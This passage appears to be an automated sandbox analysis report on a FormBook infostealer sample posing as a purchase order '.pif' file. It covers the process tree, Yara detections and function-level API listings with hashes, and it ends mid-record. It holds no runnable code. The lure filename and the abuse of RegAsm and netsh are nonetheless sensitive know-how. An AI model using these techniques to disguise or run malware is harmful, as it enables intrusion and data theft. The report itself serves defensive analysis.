Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	05:31:28
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	05:31:29
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa30000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	05:31:29
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netsh.exe"
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	05:31:43
Start date:	08/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	134
Start time:	05:32:04
Start date:	08/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	137
Start time:	05:32:06
Start date:	08/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	7

Executed Functions

Function 00A8CFF0 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A8D07E
GetCurrentThread.KERNEL32 ref: 00A8D0BB
GetCurrentProcess.KERNEL32 ref: 00A8D0F8
GetCurrentThreadId.KERNEL32 ref: 00A8D151

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a7d8856c03404ed8aaaac15426ac9ff5c2f003d77b9b6ba24387b9a8a1b811b4
Instruction ID: e98af05be58f30b3b2b17fed4027dc2b955cb5304564ac6896a97a368e7cb24a
Opcode Fuzzy Hash: a7d8856c03404ed8aaaac15426ac9ff5c2f003d77b9b6ba24387b9a8a1b811b4
Instruction Fuzzy Hash: B05158B0901349CFEB14EFA9D548BDEBBF1EF88314F208459D409A73A1D7789984CB25

Function 00A8D000 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A8D07E
GetCurrentThread.KERNEL32 ref: 00A8D0BB
GetCurrentProcess.KERNEL32 ref: 00A8D0F8
GetCurrentThreadId.KERNEL32 ref: 00A8D151

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d853e8fe49e5e8d77c521340a6fa3626c90fea83ad712f32e6fc2d6a358b3af8
Instruction ID: bd5e2ae0b687f1cea8deb33e88e8c424b11972c1a5fde493cd4243e74b2d97cc
Opcode Fuzzy Hash: d853e8fe49e5e8d77c521340a6fa3626c90fea83ad712f32e6fc2d6a358b3af8
Instruction Fuzzy Hash: 7C5136B0900349CFEB14EFAAD548BDEBBF5EF88314F208459D419A73A0D774A984CB65

Function 00A8AD68 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00A8AFBE

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4099ba1ed3fa117099614583eb342576653a59adeec643b118fe9afac6f1158f
Instruction ID: c10e7ccd7d0d56325b7ce286b30cb071f8fab85aa0c25ca19ea6b5717ce9a0dd
Opcode Fuzzy Hash: 4099ba1ed3fa117099614583eb342576653a59adeec643b118fe9afac6f1158f
Instruction Fuzzy Hash: B0711670A00B058FEB24EF2AD54179ABBF1FF98304F108A2ED44AD7A50D775E849CB91

Function 00A8449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A859C9

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1d4679b748c0bd8151113b76485e0d831cb666916261fcc9bd8f9caa239c569f
Instruction ID: 80b45dc408ad346d241d9a144b31eb30643e8446061a24112516c372ac48263e
Opcode Fuzzy Hash: 1d4679b748c0bd8151113b76485e0d831cb666916261fcc9bd8f9caa239c569f
Instruction Fuzzy Hash: 2E41AFB0D0071DCBDB24DFA9C88479EBBB5BF48704F20856AD808AB251DB756945CF90

Function 00A8590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A859C9

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ef347560c5d5840ad04b6deed726fefde67be2d0b67cb0795c4a9616c8a1d524
Instruction ID: 9851fef2cd23b767ddcf4841c7de727a6c8d7984dca732ace49b87a44d7be5dd
Opcode Fuzzy Hash: ef347560c5d5840ad04b6deed726fefde67be2d0b67cb0795c4a9616c8a1d524
Instruction Fuzzy Hash: C341CDB1C0061DCBDB24DFAAC8846DEBBB2BF48704F20856AD808AB251DB756949CF50

Function 00A8D648 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8D6D7

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d19f72f8cfb73b2d8b8dbe6309c6136869b6ab7fef60a425919188b46b9b789
Instruction ID: 14c00ece3e19e22a295df7b44b22d7bbfd7037dd84fc487e13752bef4c7f662c
Opcode Fuzzy Hash: 9d19f72f8cfb73b2d8b8dbe6309c6136869b6ab7fef60a425919188b46b9b789
Instruction Fuzzy Hash: C821E3B5900259DFDB10DF9AD884AEEBFF5EB48310F24841AE918A7350D374A954CF64

Function 00A8D650 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8D6D7

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f40678e3b1215aa2698711b48c7e737a8801396eefdeec8a59a3222eb9afdec8
Instruction ID: 19d118aa734c00a60c50338d3837398a1a7c26d4b9e18ff8b8d0ba284870d239
Opcode Fuzzy Hash: f40678e3b1215aa2698711b48c7e737a8801396eefdeec8a59a3222eb9afdec8
Instruction Fuzzy Hash: 8521E4B5900249DFDB10DF9AD884ADEBFF4EB48310F14841AE918A7350D374A954CFA4

Function 00A8AF58 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00A8AFBE

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 90fda9cd8e8e0de29dd85da31f8006be263e70c45bc845a2e3fd4dfec82736d2
Instruction ID: 3644f2715899ad1c1e1f029e66586577419a359019f9f2059c06acef622e2061
Opcode Fuzzy Hash: 90fda9cd8e8e0de29dd85da31f8006be263e70c45bc845a2e3fd4dfec82736d2
Instruction Fuzzy Hash: 3311E0B5C007498FDB10DF9AD444ADEFBF4AF88324F10841AD519A7610C379A945CFA5

Function 00A0D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172706671.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee6d7782e31574ac2543d7e2c461c8b8352854695e7a63241e90ab689dd054d
Instruction ID: c6cb61b217bb9cfbb12ff937032a7b17bb50d35d8d09b5ed5a7c76c5812b1ec8
Opcode Fuzzy Hash: eee6d7782e31574ac2543d7e2c461c8b8352854695e7a63241e90ab689dd054d
Instruction Fuzzy Hash: A821F272504248EFDB05DF54E9C0B26BF65FB88318F24C56DED090B296C336E856DBA2

Function 00A0D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172706671.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a438d28e2c50e39adc321b89bb8c9624883fa27b15724e70a637e1d694b89e
Instruction ID: a85e8fac7346b9800cf51ba2132cc8e5747c28cdad9c4fd8f6bc25e5332b020a
Opcode Fuzzy Hash: 67a438d28e2c50e39adc321b89bb8c9624883fa27b15724e70a637e1d694b89e
Instruction Fuzzy Hash: 69210372500208EFDB04DF54E9C0B26BB65FB98324F20C56DE9090B296C337E856CAA2

Function 00A1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172815194.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63caffd94632106c813bd71c064e2108d361584e65402824da0587d8dbd92e52
Instruction ID: 225d6a2b60208cd5020c88e4eba99d3489bb4a3ad0ac49321a62d6a5f02e9dd8
Opcode Fuzzy Hash: 63caffd94632106c813bd71c064e2108d361584e65402824da0587d8dbd92e52
Instruction Fuzzy Hash: 5C210475604204EFDB14DF14D9C4B56BB65FB88314F34C56DD90A4B296C33BD887CA61

Function 00A1D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172815194.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42faaeb3599f4cfd183338ecfd13e9148ae7e0dbc3e28a3ad3a2129bfede8414
Instruction ID: be1e84c1e2b74b447aee0a39a066d7ed66f744ed763432b03518508f6687e2b5
Opcode Fuzzy Hash: 42faaeb3599f4cfd183338ecfd13e9148ae7e0dbc3e28a3ad3a2129bfede8414
Instruction Fuzzy Hash: D9219F755093808FCB02CF24D990B15BF71EB49314F28C5DAD8498B2A7C33A984ACB62

Function 00A0D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172706671.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: 9e67a373f6f5f733b8e5eb9270ba23ee18b4a7cdf56ed4af48bd025ef23289ec
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: 9811D376504284CFCB15CF54E9C4B16BF71FB98318F24C6A9DC490B696C33AE85ACBA1

Function 00A0D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2172706671.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: c9d9168f33193b00ee65e1d505b0c985daae8bbf65770576ada7a12f53d17737
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: FB11D376504244DFCB15CF54D5C4B16BF71FB94324F24C6A9D8090B656C33AE856CBA1

Non-executed Functions

Function 00A8D57C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173105624.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_PURCHASED ORDER OF ENG091.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa84acce6eb05fb714e247e4863076604695fe7d64260dd97db57f035e07435f
Instruction ID: d2415ee8671b4dbd0e71a816f635573ee21b3e9f548314b0d0b649b09f24a5e5
Opcode Fuzzy Hash: fa84acce6eb05fb714e247e4863076604695fe7d64260dd97db57f035e07435f
Instruction Fuzzy Hash: 10A17F32E10206CFCF05EFB5C94459EB7B2FF85304B15817AE905AB265EB71D956CB40

Analysis Process: RegAsm.exePID: 5412, Parent PID: 3472COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	554
Total number of Limit Nodes:	72

Executed Functions

Function 0041A392 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A38D
NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A435

Strings

1JA, xrefs: 0041A40C, 0041A418
rMA, xrefs: 0041A412, 0041A420
rMA, xrefs: 0041A42D, 0041A434

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID: 1JA$rMA$rMA
API String ID: 3388366904-782607585
Opcode ID: bdd182fdf173e423650353cf0e96e187f9460ba0a5fef95a26f139b38da4cef5
Instruction ID: 3e15696e6ec2684b4bd66a12eca4a725a288b0c5d0f6d4c3f1277ea1f6239de5
Opcode Fuzzy Hash: bdd182fdf173e423650353cf0e96e187f9460ba0a5fef95a26f139b38da4cef5
Instruction Fuzzy Hash: 1321F6B2204148AFCB08DF98DC91DEB77E9AF8C358B158249FA1DD7241D634EC52CBA5

Function 0041A3EA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A435

Strings

1JA, xrefs: 0041A40C, 0041A418
rMA, xrefs: 0041A412, 0041A420
rMA, xrefs: 0041A42D, 0041A434

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: a407d8f4a22e83e68a0ca9600d668e9257f6d901ee752e257b7c0e617bfec185
Instruction ID: af61daceeb644c511f7715f8bc253ea0764d36c86b2e54f803058e487cb20e05
Opcode Fuzzy Hash: a407d8f4a22e83e68a0ca9600d668e9257f6d901ee752e257b7c0e617bfec185
Instruction Fuzzy Hash: 8FF0E2B6200208ABCB18DF89DC80EEB77A9AF8C354F158249BA1D97241C630E851CBA0

Function 0041A3F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A435

Strings

1JA, xrefs: 0041A40C, 0041A418
rMA, xrefs: 0041A412, 0041A420
rMA, xrefs: 0041A42D, 0041A434

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: ce1bc2d064c00839faf5bd8b93394b6c5419ce9a9a2d71b0bea575cdbeb786e1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E2F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D634E851CBA4

Function 0041A43A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A435

Strings

rMA, xrefs: 0041A42D, 0041A434

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: rMA
API String ID: 2738559852-3963102562
Opcode ID: 2593f6b238117513c6323c2009fdedb8786ec4f23442fdd043c8a7e0eaccb7f4
Instruction ID: 80d9516c1a8b450ddb88e944e5e5d3cbc23b0821d682f6e6105ecd5a997128d4
Opcode Fuzzy Hash: 2593f6b238117513c6323c2009fdedb8786ec4f23442fdd043c8a7e0eaccb7f4
Instruction Fuzzy Hash: 45F082752052047BD714EF94EC85EEB77ACEF88324F00854EFE5C8B241C574E91087A0

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
Instruction ID: b1761755ca729dbac5576e269b06489feed39cb8f4253d4d7eb1a5eaea1f1258
Opcode Fuzzy Hash: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
Instruction Fuzzy Hash: CF015EB6D4020DABDB10DBE1DC42FDEB3789F54308F0041AAE908A7281F634EB54CB95

Function 0041A340 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A38D

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6a08f5bb4c8eec6804f1b8ba867535132261ee6e386aa643fc4990a6d2625b59
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: ACF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A520 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B114,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A559

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 10540bddac26320f3858fd092246dee1fac7b3f1ca52992ffc4ee6f45b316179
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: ABF015B2200208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C634F811CBA4

Function 0041A470 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A495

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 4a42b5392fdafe908cebb77e42714e5129cd0849f845076cc73c6b9800782e78
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 33D01776200214ABD710EB99CC85EE77BACEF48764F154499BA189B242C534FA1086E0

Function 03392B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392B6A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e858895c6fddd8b472bfbfdc78316a0a78b7fa71b9d0ecabcf08a91801e1ea74
Instruction ID: 5d5763ededc40e087146de99ec9762f1d19bd6b69d1353350fabd47cb95f43b6
Opcode Fuzzy Hash: e858895c6fddd8b472bfbfdc78316a0a78b7fa71b9d0ecabcf08a91801e1ea74
Instruction Fuzzy Hash: AA9002A5712804034105B19C4458616440AC7E0201B55C021E1014990DC62589916125

Function 03392BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392BFA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5bc6a0184f20b19cbd11b142e3bda4d25f4702b0fd437d12f3e0b8e8ea2d571
Instruction ID: bc9e253055c778c5c31a9c4cfbc992409ce941524399c8ca17975b5589dcd929
Opcode Fuzzy Hash: d5bc6a0184f20b19cbd11b142e3bda4d25f4702b0fd437d12f3e0b8e8ea2d571
Instruction Fuzzy Hash: 2090027571180C02D180B19C444864A0405C7D1301F95C015A0025A54DCB158B5977A1

Function 03392AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392ADA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

